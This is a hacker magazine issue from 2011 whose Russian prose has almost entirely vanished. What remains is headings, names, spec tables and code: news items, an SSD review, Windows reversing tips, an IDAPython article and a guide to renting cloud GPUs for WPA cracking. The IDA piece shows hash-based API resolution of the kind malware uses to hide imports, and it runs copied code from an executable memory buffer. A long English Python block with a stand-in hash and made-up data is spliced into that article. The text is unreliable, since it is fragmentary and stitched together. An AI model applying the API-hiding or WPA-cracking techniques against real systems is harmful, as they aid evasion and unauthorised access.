
.

120

x 02 (145) 2011

.
210
:

ONLINE

02 (145) 2011

MAC OS/

MAC OS

. 46

. 68

145


PHP
WHATHTML:
CRACKME

HACK IN THE BOX
IDA + PYTHON =


ACTIVE DIRECTORY
. 60

INTRO

,

,
. ,
,
-,

,
,
.
: ,
,
IT .
. 15

-,
300 . . ,
.
,
. ,
,
, .
,
.
:

-, ,

, -, -
. , . ,
, .

,
,
.
Skype, ,
, ,
-, p2p-,
opensource,
, YouTube
- .
,
,
.
,

:
, .
: TOR, VPN, SSL DHT
:).
nikitozz, .

CONTENT
MegaNews

004

076

FERRUM
012

SSD-

PC_ZONE
018

022

IDA + Python =

027

028

Google Chrome OS

Windows

- Google

032

Easy-Hack

036

042

WhatHTML

046

050

Welcome to Malaysia!

056

060

066

X-Tools

HITB -

080

086

092

MALWARE
068

073

Java

Mac? , !

Java-


GNU/Linux

097

099

Windows

102

PHP

Microsoft Detours

PHP+WMI

SYN/ACK
106

Drupal'

112

116

120

PHP

Python IDA?

-?

cloud- OpenStack:

124

FAQ UNITED

127

128

WWW2

FAQ

8.5

web-

046

068

Mac? ,
!

073

Java

Java-

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: +7 (495) 935-7034 : +7 (495) 545-0906
>

>

>.

>

>

>

>

>

>

>PR-

> GAMES & DIGITAL


>

>


> MAN TV

>
( )
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

>


/:

>
(kosheleva@gameland.ru)
>

>

>


> :
DVD-: claim@gameland.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, ,
, / 652,

,

77-11802 14.02.2002
Zapolex,
.
145 437 .

.

. ,
,
.


.
.


:
content@gameland.ru
, , 2011

MEGANEWS

Mifrill mifrill@real.xakep.ru

Meganews


, :
Google Nexus S
Google Android 2.3 . , HTC, Samsung.

Galaxy S.
Samsung Hummingbird, Cortex A8 1 , 512 16 - .
Nexus S 4- (480x800) Super
AMOLED
,
. ,
.

,
: Wi-Fi 802.11 n/b/g, Bluetooth 2.1+EDR
Near Field Communication (NFC).

, A-GPS,
, , ,
.
5- Nexus S 720x480,
. (640x480 ), ,
-. ,
1500
7 , 18 !
.
, Nexus S
Super clear LCD.
Galaxy S, 20-25
.
$529 ( ).

DDoS- Wikileaks 10 /.
208 :).


, CONFidence 2.0, ,
Elcomsoft -. ,
Canon Original Data Security. ,
Canon ,
. . , , .
Original Decision Data (ODD), EXIF JPG -
.
OSK-E3 (Canon Original Data Security Kit),
- . , GPS.
Canon ,
.
( iPhone ),
, . , , .
Canon,
EOS 5D Mark II.
(elcomsoft.com/canon.html?r1=pr&r2=canon).
,
.


X 02 (145) 2011

WINDOWS PHONE 7
Microsoft,
.
ChevronWP7,

(chevronwp7.com). ,
,
WP7 .
,
,
. ,

,
, Microsoft

Windows Phone 7 Marketplace $99,


.
ChevronWP7 .


.
Windows Phone 7 .
,

.
, , . , ChevronWP7,
, ,

. -
. , ,

ChevronWP7, .

2015 Intel, AMD, Dell, Lenovo, Samsung LG


VGA
LVDS. HDMI DisplayPort.


-
.
19-
.

,

. iTunes Amazon -

,
.
. 2008 2009
6.000 ,
2.000 .
500.000
( $750.000) .

80 ,

iTunes 99 .

,

, .

.

PLAYSTATION PHONE
:
Playstation Phone , , . PSP Go Android Zeus Z1,
Sony Ericsson. , , - ,
. ,
Nokia N-Gage
:). ,
.
Sony .
,
, : Zeus
Z1 PSP Go, 3.7,
1 , 512 , microSD-, 5- . ,
, Cebit 2011.



BLACKHAT

16 19 ( ) BlackHat DC. ,

. , 1997 , 4
,
, :

. . ,
Digital Security
DSECRG, ][.
. :
, .
, - :
-,

,
. , .
DSECRG -. BlackHat
: Hack
In The Box, Source Barcelona, DEEPSEC, Confidence, Troopers.
:). - : , ,
,
.
ERP-.
,
blackhat.com/html/bh-dc-11/bh-dc-11briefings.html#Smith.

Wired , eBay
... .
eBay $8 .


?

, , ,
,
. Apen E FUN
APEN A2 .

. ,

.
100 .
Windows, Mac. , -
, Microsoft Office
Outlook.
$100.




(Free Software Foundation),
, .

FSF GNU Savannah (savannah.gnu.org). Savane,
SQL- MySQL-
.
,
html- CVS-, gnu.org. , : php- - (
GNU GPL)
. FSF,
, ( ,
). Savannah,
GNU .
GNU Savannah . Crypt-MD5. ,
, , ,
, , .

Time Facebook
. ,

382 000 .

The Pirate Bay, , , ,


. , ,
,
(, ). ,

,
, . ,
, $6.5 .
, , ,
.
, , , .
,
.
DNS, p2p. ,
ICANN.
, ,
.
IRC- dns-p2p Efnet,
dot-p2p.org.
, ,
. , ICANN
, IP-.
, ,
, .

AdaptiveMobile, 2010 ,
Android-, 4 , iPhone
2 .



3D
3D-, , .
.
EIZO 3D-. DuraVision FDF2301-3D
, - ,
, , .
23- .
, Full HD
(1920x1080), -, . ,
: 16 :). ,
, 3D-
. :
EIZO ( -
, ). , ,
,
, .
, ,
3D, .

DVI-D VESA Stereo Sync,


.
: EIZO
. .


,
. , ,
. Word Lens
iPhone , . . : iPhone
(, ), ,
. ,
! , ,
questvisual.com. , , ,
, iTunes $4.99.
, Word Lens
- - .
,
, .

460 2010 ,
, .


ZeuS
, . F-Secure
,
. CPU
2 , ,
, .
, IBM T42 ( 1.86
) ,


:). ,
(, )
.
,

.

.
,

. , ,

,
.
,
, .
, (
) .

Avira , 9000
25% ,
.

GOOGLE

FACEBOOK


Google. ,

.

. Google ,
,
, ,

. ,

,
,
.

.
. , ,
. , Google -
, ,

. ,


, .


, ,
Facebook .
:


.
, Hacker Cup
2011 (facebook.com/hackercup)
, , .

20 10 (
). .
.
,
,
72
. , ,
.
300 ( Hacker Cup) 25 .
: $5000 , $2000 , $1000 $100 4-
25-. , , , Facebook -.

Google Chrome 800


13 , 4 .
Google $4000
.

- IPS-
,
,
Samsung.
,
Super PLS (Plane to
Line Switching),

IPS. Samsung ,

, Super
PLS. ,

, Samsung
Mobile Display
10%
. SPLS-

WXGA (1366768 ).
, Super PLS
15% IPS.

, ,

2011-.



VISIONTEK
Killer
HD 5770 VisionTek.
PCI Express

, , ,
,
, .
.
VisionTek
Bigfoot Networks
Killer E2100.

Killer 2100 ,
. ,

: AMD Radeon HD 5770
DirectX 11,
(7.1)
HDMI.
$200. ,

PCI-E.
, , PCI-E SSD-. PCI-E

SSD-.
750
/c, 700 / !

YouTube .
, ,
YouTube 15 .

ACM ICPC

- (
, )

(ACM ICPC) - . ACM
ICPC
.


, ,

IT- , , .
-
1996-1997,
.

720
260 (, , , ,
).
,
,
.
: .

. ,


:). ,
,
.
C, C++ Java -

.
, ,

, .

( ).
:

(
ACM ICPC , );
(

).
ICPC 2010-2011,
, NEERC 13
. ,

: icpc.baylor.
edu. ,
?


Patriot Memory
,
Supersonic,
USB 3.0. Patriot
.
70 100
/ ( 60 80


/). Patriot
.
-
- USB ,
USB 3.0

. .
, 32 64 ,
.
, , ,

2011.

FACEBOOK

Facebook , ,
. ?
Facebook . ,
. Facebook
: ,
. , Facebook
. , , , . , , Facebook,
, . .


2010 23- . ,
,
10 ! , Mega-D,
.
,
, ,
. -
. 2009
: .
$459 000, . , , ,
, ,
, Docent.
Gmail, .
-,
.
, .
$250 000.

Google .
3
books.google.com/ebooks.

,
,

.
,
,
.
, , ,

.
, Windows -
(
,
).

,
Trojan.Winlock.2477, 295
. ,
,
!
Trojan.Fakealert.19448,
,
. ,
:
.


FERRUM


SSD-

, ,
,
.
. SSD- :
, HDD .

SSD- , 1978 ,
StorageTrek. 1995 , MSystems, SSD- -.
, 2008 , Mtron Storage Technology, ,
SSD- 260 240 /
. SSD HDD? . , . SSD
, ,
. , SSD
.
. , , ,
. SSD-,
,
. , 128 512 , 1024
512 . , -


4 ,
512 . HDD.
, 75%
, . TRIM,
.
SSD , SandForce
DuraClass.
, SATA III.
,
.


, ,
, Crystal
DiskMark 2.2 PCMark Vantage. : 80%,
SSD .

Test bench:
CPU: AMD Phenom II X6 1090T (3.2 GHz)
Motherboard: ASUS M4A89GTD PRO
Memory: Kingston DDR3-1333 KVR1333D3N9, 4 GB
Video card: Sapphire Radeon HD 5870, 1 GB
Power supply: ATX Enhance, 600 W
OS: Windows 7 Home Premium

Drives tested:
ADATA S596
Corsair Nova V128
Intel X25-M G2
Intel X25-M G2 x2 RAID 0
Kingston SSDNow V+ 128
Kingston SSDNow V+ 512

ADATA S596 (10000 rub.)
Read: 250 MB/s
Write: 180 MB/s
Interface: SATA II, USB 2.0
Cache: 128 MB
Capacity: 128 GB

Corsair Nova V128 (12500 rub.)
Read: 270 MB/s
Write: 195 MB/s
Interface: SATA II
Cache: 64 MB
Capacity: 128 GB

ADATA S596 USB-. , ,


:
, , .
, ,

USB. ,
TRIM.
, ADATA S596 ( , )
. ,
, .

Corsair , SSD- . ,
, Corsair Nova V128 .
Indilinx Barefoot.
, PCMark
Vantage . ,
TRIM , Corsair Nova V128
. -, , ,
3.5, ,
SSD-.

,
SSD- .

, 4 512 , ,
.




Intel X25-M G2 (14500 rub.)
Read: 250 MB/s
Write: 70 MB/s
Interface: SATA II
Cache: 32 MB
Capacity: 160 GB

Intel X25-M G2 x2 RAID 0 (29000 rub. for the pair)
Read: 500 MB/s
Write: 140 MB/s
Interface: SATA II x2
Cache: 32 MB x2
Capacity: 320 GB

Intel , Intel X25-M G2


160 .
, , 3.5- ,
SSD Toolbox ,
. ,
, : ,
. ,
Intel X25-M G2, .

HDD, SSD , , ,
, , RAID-,
.
RAID- 0 Intel X25-M G2, .
512 .

, .
, Intel X25-M G2
.


. -,
320 ,
. . RAID 0 , , ,
.
, .
, , .

Kingston ssdNOW V+ 128 (11000 rub.)
Read: 230 MB/s
Write: 180 MB/s
Interface: SATA II
Cache: 128 MB
Capacity: 128 GB

Kingston ssdNOW V+ 512 (53000 rub.)
Read: 230 MB/s
Write: 180 MB/s
Interface: SATA II
Cache: 128 MB
Capacity: 512 GB


, , ,
,
. , , , .
Kingston ssdNOW V+ .
SATA- molex-SATA,
,
USB. ,
.
, ,
.

, , ,
SSD- .
Kingston , .
,
, . ,
Kingston ssdNOW V+ :
, .
TRIM, Kingston ssdNOW V+ 128 .

, ,
,
3.5-. PCMark
Vantage .

4 .
,
,
. SSD- 128
Kingston .

Intel X25-M G2,


Kingston ssdNOW V+.

. z

SSD- ,
.



Benchmark charts (figure): PCMark Vantage "Windows Defender", "Windows Vista startup", "Windows Media Center" and "Application loading" scores, and CrystalDiskMark sequential read, sequential write, random read 4KB and random write 4KB throughput (MB/s), for the six configurations tested: Kingston ssdNOW V+ 512 GB, Kingston ssdNOW V+ 128 GB, Intel X25-M G2 160 GB x2 RAID 0, Intel X25-M G2 160 GB, Corsair V128 128 GB and ADATA S596 128 GB, each measured in the "Clean" state and at "Load 80%" (drive 80% full). Photo captions: Kingston, Corsair, Intel RAID.

PC_ZONE
M0r1arty moriarty@front.ru, graum l.shigarevskiy@gmail.com

Windows

, ,
, .
, ,
, , -
.

.
, - -
- ,
ERP-. ,
. ,
, . , ? ! :)


, : ? :
1. , .
2. , .
3. .
, .

Process Monitor
FileInfo Activex / OCX.
EXE/DLL
, (), (Named Pipes), , COM/ActiveX
. , , ( , ) Windows , IPC .
,
- ,
.

, ,
- NT Filemon NT
Regmon,
.

. , Process Monitor.

,
. : Show
Registry Activity Show File System Activity.
, ProcMon, ,
. ProcMon,
, (
), Process Name
Include SuperProg.exe, SuperProg.exe
. , Process Monitor
, . , ,
Process Monitor, .
. File -> Save.
Events to save Events displayed
using current filter( Also include profiling events
), Format Comma-Separated Values
(CSV). - Logfile.csv .
? :)
. , , ,
Perl- ( ). ,
Logfile.csv ( ).
parse.pl. log-
: file.log
, reg.log .

.
reg.log. , HKLM/Software
HKCR/Interface ,

.pl -C
( UNICODE')
(
). . ,
-, , .
export.pl.
REG- (
) + subdir. Reg-, :
;
;
.
, ()
(DLL-, ),
. REG-, .
. subdir
:
subdir
C ( )
Program Files
,

C:\Program Files
( ). ,
. subdir
, , . , ,
.
. , ( set ).
, , ,
. ,
- , () .
Windows - SFC (System File Checker),
.
. ,
, .
COM-
(DllRegisterServer, ).



DELETE !
Perl UNICODE

, ,
UNICODE.
, .

, : regsvr32
component.dll, component.dll COM- (,
COM- exe-).
Total Commander , lister, COM/ActiveX.
- ,
. , BDE(Borland Database Engine) DataSource, .
,
( ). .
, . ,
COM- .

, ,
install.exe?
, ? - , OllyDbg.
DeviceIoControl ( ),

CreateFileA/CreateFileW. .
. <Ctrl+G>, CreateFileA <OK>.
.
<Shift+F4> Breakpoint Conditional
log. Expression DWORD
PTR DS:[ESP+4]
. Decode value of expression as Pointer
to ASCII string ( - Pointer to
UNICODE string). - <Log value of expression>
Always. . <OK>
.
, , , . OllyDbg (
<Ctrl+L>) ,
COND. ,
\\.\ , . WinObj
(, )
. Device\DevName.
WinObj ,
.
. %SystemRoot%\System32\Drivers.
UNICODE- (Device\DevName).
, .
,



.

( , ).
, , , . , , ,
: \HKEY_LOCAL_
MACHINE\System\CurrentControlSet\Services\__ Group ObjectName .
,
, , ,
.

, . 70-75% . - ? . .
. ,
( ExitProcess,
). - , . REG-. ,
-, . subdir
. ,
, , Access violation,
(
). , ,
: + + .
,
,
.
,
. ,
, .
Bdetest.exe BDE testBDE, -
.
: ,
BDE-, , .

.
IT , , , ,
. : ! ,
, ,
. z

PC_ZONE
Ant antitster@gmail.com

IDA + Python =
Python
IDA?

IDA .
Hex-Ruby,
.
, .
, IDA 1 -,
. ,
, -. IDA
: (
www.openrce.org/
downloads/browse/IDA_Plugins), ,
IDC.
.

IDC

IDC , .

C,
.
IDA, :


auto.
,
.
: (integer),
(string) .
IDC C ,
.
C.
(+=, -=, *= ),
.
,
strcpy(), strcat() .
, .
, ,

.


Diagram: IDAPython plugin architecture (IDA Pro -> IDA Plugin API -> IDAPython plugin -> Python interpreter -> operating system).

HTTP://WWW
links


IDAPython:
hex-rays.com/idapro/
idapython_docs;
,
Appcall:
hexblog.com/?p=113.

() LoadLibraryA
,
.

static. IDC ,
(.idc-).
, .
,
( IDC ).
, - ,
, . , , return.
, .

.

#include <idc.idc>
main.

,
,
, .

#include <idc.idc>

static main() {
    auto ea, func, ref;
    // address under the cursor
    ea = ScreenEA();
    // walk the functions from the start of the segment (SegStart)
    // to its end (SegEnd)
    for (func = SegStart(ea);
         func != BADADDR && func < SegEnd(ea);
         func = NextFunction(func))
    {
        // skip addresses that do not start a function
        if (GetFunctionFlags(func) != -1)
        {
            Message("Function %s at 0x%x\n", GetFunctionName(func), func);
            // every code reference to the function
            for (ref = RfirstB(func); ref != BADADDR; ref = RnextB(func, ref))
            {
                Message("  called from %s(0x%x)\n", GetFunctionName(ref), ref);
            }
        }
    }
}

. ScreenEA()
,
, SegStart() SegEnd()
. ,
,
NextFunction(). , , , -1 (BADADDR).
GetFunctionFlags() , ( , -1). GetFunctionName()
. ,
RfirstB() RnextB().
.idc
.
File Script File... (
<Alt+F7>) . Output Window
:
Function start at 0x401000
Function sub_401060 at 0x401060
  called from start(0x401006)
Function sub_401090 at 0x401090
  called from sub_4010E0(0x401185)
Function sub_4010E0 at 0x4010e0

INFO

info


Python
IDA

,


IPython (http://bit.ly/rl4kK).

Python-,

, .
IDA 6.0 Pro (hexrays.com/products.shtml)
,
.
5.0
,
.



Diagram: IDAPython module layering (user script -> IDC compatibility layer and idautils -> idaapi -> _idaapi; other Python modules alongside).

IDA + Python = IDAPython

, IDAPython.
: IDA Python, ,

IDC.

Python. ,
IDA SDK,
,
IDC. (code.google.com/p/idapython)
IDA. plugins python
IDA. , Python.

IDAPython (, idapython-1.4.3_ida6.0_py2.6_win32.zip Python 2.6).
examples, , .
IDAPython :
idaapi, IDA API;
idc, IDC;
idautils, .
.

Python'
IDAPython. , ,

. idaapi.
from idaapi import *

# address under the cursor
ea = get_screen_ea()
# segment that contains it
seg = getseg(ea)
# walk the functions of that segment
func = get_func(seg.startEA)
while func is not None and func.startEA < seg.endEA:
    funcea = func.startEA
    print "Function %s at 0x%x" % (get_func_name(funcea), funcea)
    # code references to the function
    ref = get_first_cref_to(funcea)
    while ref != BADADDR:
        print "  called from %s(0x%x)" % (get_func_name(ref), ref)
        ref = get_next_cref_to(funcea, ref)
    func = get_next_func(funcea)

, IDC-. ,



( Output Window
)
, :
, . idautils:
from idautils import *

ea = ScreenEA()
for funcea in Functions(SegStart(ea), SegEnd(ea)):
    print "Function %s at 0x%x" % (GetFunctionName(funcea), funcea)
    for ref in CodeRefsTo(funcea, 1):
        print "  called from %s(0x%x)" % (GetFunctionName(ref), ref)

- Python:
.
, .

-. , , IDA.
( IDC IDAPython).
- .
, IDA , .
, ,
.
, . , , API- ,
,
.
. PEB (Process Environment Block)
kernel32.dll
LoadLibrary GetProcAddress.
. GetProcAddress ,
, ,
. , . ,
,
.
,
,
.
Hello, world! MessageBox.

.
Enums
: GetKernelAddress() kernel32.dll, CalcHash() , GetProcAddressEx() .
:
.........
// function pointer types for the APIs resolved by hash (declared in the elided part of the source)
typedef HMODULE (WINAPI *tLoadLibraryA)(LPCSTR);
typedef int (WINAPI *tMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

int main()
{
    HMODULE kernel32, user32;
    // base address of kernel32.dll (found through the PEB)
    kernel32 = (HMODULE) GetKernelAddress();
    // LoadLibraryA, looked up by the hash of its name
    tLoadLibraryA pLoadLibraryA = (tLoadLibraryA)
        GetProcAddressEx( kernel32, 0xC8AC8026 );
    // load user32.dll
    user32 = pLoadLibraryA("user32.dll");
    // MessageBoxA from user32.dll, again by hash
    tMessageBoxA pMessageBoxA = (tMessageBoxA)
        GetProcAddressEx( user32, 0xABBC680D );
    pMessageBoxA(0, "Hello, world!", 0, 0);
    return 0;
}
..........

:
00401000  push    ebp
00401001  mov     ebp, esp
00401003  sub     esp, 10h
00401006  call    sub_401060              ; <--- GetKernel()
0040100B  mov     [ebp+var_8], eax
0040100E  push    0C8AC8026h              ; <--- LoadLibraryA
00401013  mov     eax, [ebp+var_8]
00401016  push    eax
00401017  call    sub_4010E0
0040101C  add     esp, 8
0040101F  mov     [ebp+var_4], eax
00401022  push    offset aUser32_dll      ; "user32.dll"
00401027  call    [ebp+var_4]
0040102A  mov     [ebp+var_10], eax
0040102D  push    0ABBC680Dh              ; <--- MessageBoxA
00401032  mov     ecx, [ebp+var_10]
00401035  push    ecx
00401036  call    sub_4010E0
0040103B  add     esp, 8
0040103E  mov     [ebp+var_C], eax
00401041  push    0
00401043  push    0
00401045  push    offset aHelloWorld      ; "Hello world!"
0040104A  push    0
0040104C  call    [ebp+var_C]
0040104F  xor     eax, eax
00401051  mov     esp, ebp
00401053  pop     ebp
00401054  retn

, API- .
MessageBox call [ebp+var_C] ( 0040104C).

.
. ? ,
, ,
0040100E 0040102D .
, ?
, , call. ,
? - IDAPython.

, sub_401060
kernel32.dll. sub_4010E0,


calc_hash 9
( kernel32.dll),
.
.
:
. ,
. , IDA , , .
IDA Pro
. ,
.
, idaapi.get_debug_names().
fetch_debug_names,
(, , ):


hash_kernel32_LoadLibraryA Enums
, .
. call ( 00401185),
. ,
. calc_hash. , ,
(
) . , . -.
IDAPython ,
calc_hash
. :
calc_hash ;
;
calc_hash
;
.
, . calc_hash . ,
IDA ctypes:
from ctypes import *
import idaapi, idc

# locate calc_hash in the database and copy its bytes out of the IDB
f = idaapi.get_func(idc.LocByName('calc_hash'))
body = idc.GetManyBytes(f.startEA, f.endEA - f.startEA)
# VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE): an executable buffer
# inside IDA's own process (this only works because the copied code is self-contained:
# position independent and calling nothing outside itself)
calc_hash_ptr = windll.kernel32.VirtualAlloc(0, len(body), 0x1000, 0x40)
# copy the function body into the buffer
memmove(calc_hash_ptr, body, len(body))
# describe the prototype with CFUNCTYPE: cdecl, returns a 32-bit unsigned
# integer, takes a C string
proto = CFUNCTYPE(c_uint32, c_char_p)
# callable wrapper around the copied code
calc_hash = proto(calc_hash_ptr)

, Appcall .
Python>hex(Appcall.calc_hash("LoadLibraryA") & 0xffffffff)
0x0C8AC8026L


def fetch_debug_names():
    ret = []
    # names the debugger knows, over the whole address range: "Modulename_ApiName"
    dn = idaapi.get_debug_names(idaapi.cvar.inf.minEA,
                                idaapi.cvar.inf.maxEA)
    for addr in dn:
        n = dn[addr]
        i = n.find('_')
        # (address, ApiName, Modulename)
        ret.append((addr, n[i+1:], n[:i]))
    return ret

:
Modulename_ApiName.
_.
. . :
dn = fetch_debug_names()
cache = {}
for addr, name, modname in dn:
    hash = calc_hash(name)
    if modname not in cache:
        cache[modname] = []
    cache[modname].append((name, hash, addr))

.
IDAPython , - ( ).
- Chooser2.
, .
,
. , Enums (). .
, :
push    3FC1BD8Dh
....
call    sub_4010E0

<m> ,
:
push    hash_kernel32_GetModuleHandleA
....
call    sub_4010E0
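The whole workflow above (take the debugger's Module_Api names, hash every export, build the per-module cache, then name the immediate pushed before each call of the resolver) can be exercised without IDA. The block below is an added example, not the article's IDAPython code: the hash function is an assumed ROR13 over the API name (the article's calc_hash body is not printed, so the constants on the page such as 0xC8AC8026 will not come out of it), DEBUG_NAMES is a constructed stand-in for idaapi.get_debug_names() with made-up addresses, and LISTING is a constructed copy of the disassembly shape shown above with the immediates generated from the same hypothetical hash. It also covers the case the text does not: a hash that matches no known export.

```python
import re

# ASSUMPTION: ROR13 over the function name. The article's calc_hash is not printed, so its
# constants (0xC8AC8026 for LoadLibraryA and so on) will not match this function.
def ror13_hash(name):
    """h = ror32(h, 13) + byte, over every byte of the API name."""
    h = 0
    for b in name.encode("ascii"):
        h = ((((h >> 13) | (h << 19)) & 0xFFFFFFFF) + b) & 0xFFFFFFFF
    return h

# Constructed stand-in for idaapi.get_debug_names(): {address: "Modulename_ApiName"}.
# The addresses are made up.
DEBUG_NAMES = {
    0x7C801D7B: "kernel32_LoadLibraryA",
    0x7C80AE30: "kernel32_GetProcAddress",
    0x7C80B6A1: "kernel32_GetModuleHandleA",
    0x7E4507EA: "user32_MessageBoxA",
}

def fetch_debug_names(debug_names):
    """The split the article uses: 'Module_Api' -> (addr, Api, Module) on the first underscore."""
    result = []
    for addr, n in debug_names.items():
        i = n.find("_")
        result.append((addr, n[i + 1:], n[:i]))
    return result

def build_hash_cache(debug_names, hash_fn):
    """module -> [(api, hash, addr)] as in the article, plus hash -> (module, api) for lookups.
    Two exports hashing alike would make a hash ambiguous, so a collision is reported."""
    cache, reverse = {}, {}
    for addr, name, modname in fetch_debug_names(debug_names):
        h = hash_fn(name)
        cache.setdefault(modname, []).append((name, h, addr))
        if h in reverse and reverse[h] != (modname, name):
            raise ValueError("hash collision: %#x" % h)
        reverse[h] = (modname, name)
    return cache, reverse

# Constructed disassembly in the shape of the listing above: (address, mnemonic, operands).
# The immediates are produced with the hypothetical hash so the example resolves them;
# 0DEADBEEFh stands for a hash that matches no known export.
LISTING = [
    (0x401006, "call", "sub_401060"),
    (0x40100E, "push", "0%08Xh" % ror13_hash("LoadLibraryA")),
    (0x401013, "mov", "eax, [ebp+var_8]"),
    (0x401016, "push", "eax"),
    (0x401017, "call", "sub_4010E0"),
    (0x40102D, "push", "0%08Xh" % ror13_hash("MessageBoxA")),
    (0x401032, "mov", "ecx, [ebp+var_10]"),
    (0x401035, "push", "ecx"),
    (0x401036, "call", "sub_4010E0"),
    (0x401041, "push", "0"),
    (0x40104C, "call", "[ebp+var_C]"),
    (0x401185, "push", "0DEADBEEFh"),
    (0x40118A, "call", "sub_4010E0"),
]

IMM32_RE = re.compile(r"^0?([0-9A-Fa-f]{8})h$")

def resolve_hash_pushes(listing, reverse, resolver="sub_4010E0", window=3):
    """For every call of the resolver, walk back up to `window` instructions to the
    'push imm32' that supplied the hash and map its address to the enum-style name
    hash_<module>_<api> (None when the hash is unknown)."""
    names = {}
    for i, (addr, mnem, ops) in enumerate(listing):
        if mnem != "call" or ops != resolver:
            continue
        for j in range(i - 1, max(i - 1 - window, -1), -1):
            paddr, pmnem, pops = listing[j]
            m = IMM32_RE.match(pops)
            if pmnem == "push" and m:
                hit = reverse.get(int(m.group(1), 16))
                names[paddr] = ("hash_%s_%s" % hit) if hit else None
                break
    return names

if __name__ == "__main__":
    cache, reverse = build_hash_cache(DEBUG_NAMES, ror13_hash)
    for paddr, name in sorted(resolve_hash_pushes(LISTING, reverse).items()):
        print("%08X  push  %s" % (paddr, name or "<unknown hash>"))
```

Inside IDA the same names would be fed to the Enums window (or to the chooser built with Chooser2) and applied with <m>; here they are just printed. An unknown hash usually means the export table the debugger showed is incomplete (a module not loaded yet at the break, or a forwarded export), which is exactly the case where the `calc_hash`-in-ctypes trick pays for itself: recompute the hash for a candidate name instead of guessing.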

? !

, ,
. ,
, IDA.
, ,
.
,
. z

PC_ZONE
Step twitter.com/stepah


-?

,
.

.
,

. :).
.
- ,
,

.
CAPTCHA, API,
,


1000 CAPTCHA = $1.

.
WPA Cracker (wpacracker.
com), ($17)
-
WPA-PSK
. ,
Wi-Fi (

,
WPA Handshake).
, , .

,
, , NVIDIA
CUDA ATI Stream GPU,

. WPA Cracker
400 CPU, 135
. 5 ,
20 .
,
.
.


.
PR- Amazon
Web Services (aws.amazon.com),
,
,
, VPN-
(. PDF- ).
?
: AWS

(,
, )
.

,
, . , Amazon
API,


.
: ,
,

. ,
, . .

,
Cluster
GPU Instances. GPU- NVIDIA Tesla
Fermi M2050,
448 3 . ,

,
GPU? ,
,
: 22
, 2
, 1690 , 64- . ,

,
. ,
.
Cluster Instances

HVM CentOS 5.5,


CUDA ,
. AMI- ami-aa30c7c3 Cluster
GPU (cg1.4xlarge, 22GB). :

,
SSH
, CUDA. - CUDA-Multiforcer (
cryptohaze.com ) ,
, WPA/
WPA2-PSK Pyrit (code.google.com/p/
pyrit). , ,
.
bit.ly/ec2-gpu.

. ,
. .
, .
Amazon

Cluster GPU, . , .
$2.10 . z

WPA Cracker


PC_ZONE

GOOGLE
CHROME OS

Cr-48
Google Chrome OS

- Google
Google Chrome OS .
60 000 Cr-48
, .
. Google
, !
Google .
, . - ,
. , ,
, .
802.11b/g/n
3G. - -.
, . 1.7 ( ,
) 8


. Standby, , .
Google? -, HDD- flash-. -, Caps Lock
. -,
. , ? ,

: -!
, Cr-48

HTTP://WWW
links

Chrome OS: www.
chromeossite.com;
Google:
www.osbygoogle.ru.

DVD

USB c Chromium OS
,
,
.

eBay. , , ,
Cr-48,
.


Google?

, , Google Chrome OS.


, -. ,
,
,
. -, . ?
! Google Docs. ? Google
Mail! IM-? Google Talk!
, -.
Chrome Web Store ( ). Google
,
Skype,
2003 , ,
.
. -.
Google Chrome,
,
,
(
HTML5 Flash).
,
. ,

Chrome
. ?
.

.

,
,

( , ) ,

. , ,
: , JS- V8, 3D-. ,
.
Chrome
OS . , ,
, .
. ( Google Gears).
.

Chrome OS vs
Chromium OS

, Google Chrome OS
. , .
Chromium
OS. :
? ,
. Chrome OS , Chromium OS .
Google, open-source
. Chromium OS
,
. Chrome OS
OEM-.
:
.
: Chrome Google .

chromium.org/chromium-os, Chrome OS.
, make build.

Chromium OS. ,

dvd

Chrome OS

INFO

info

Google

Chrome OS,
,
,
,
Chrome OS
.
,
Chrome OS
,

Android.

Chrome OS
,

Android.



VMware Player

Hexxeh (chromeos.hexxeh.net). Flow
.
-, ,
. 2 usb.

Hexxeh Chromium OS:


VMWare-image VMware usb-image,


Chromium OS
Google ,
-, Chromium OS
Ubuntu. ,
.
:
1.
<Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt

3. rw:
$ sudo mount -o remount,rw /

4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic
main restricted" | sudo tee -a /etc/apt/sources.
list

5. :
$ sudo apt-get update

6. .


Chromium Flow
.
300 .
,
VMware
VMware Player (vmware.com/products/player).
: (ChromeOS.vmx)
HDD (ChromeOS.vmdk). VMware
Player Open a Virtual Machine
vmx-.
Chromium OS. , .
: . ,
. ,
, , .
Google .
usb-
Hexxeh IMG tag.gz.
WinRAR 7-zip,
(>= 2 ). .
Image Writer for Windows (launchpad.net/win32image-writer), IMG-
, . ,
File error,
. .
IMG- . ,
usb- ,
.

, /. Chrome
Google-.
, Flow,
facepunch/facepunch. :).
Chrome ( ,
,
-).
,
. , ,
, , .

- Chrome
.
<F8>, ( ). ,
<Ctrl+Alt+t> . ,
Chromium OS . wiki,
,
. ,
.
, Linux ,
Chrome OS Chrome Web Store (chrome.

Chrome OS
Cr-48, Google ,
, . ,
Caps Lock.
.
, Chrome OS .

, <F8>. :
<Shift>-<Esc> -
<Ctrl>-<Back>
<Ctrl>-<Forward>
<Ctrl>-<Next>
<Ctrl>-<Alt>-<t>
<Ctrl>-<Shift>-<i>


google.com/webstore).
Apple App Store, Android Market
: ,
.

.
, . , Google
, .

Googe . ,
. Mozilla
, (
, ). ,
.
( ),
Google ,
. .
Chrome OS,
, Chromium
OS , . ,
Google Chrome,
Chrome Web Store! z



GreenDog agrrrdog@gmail.com

Easy Hack
1

:
URL

:
! . , - url /. , -
. Perl , regexp :).
Perl
LWP, .

#!/usr/bin/perl
# check every URL in a list and report the HTTP status of each
use strict;
use warnings;
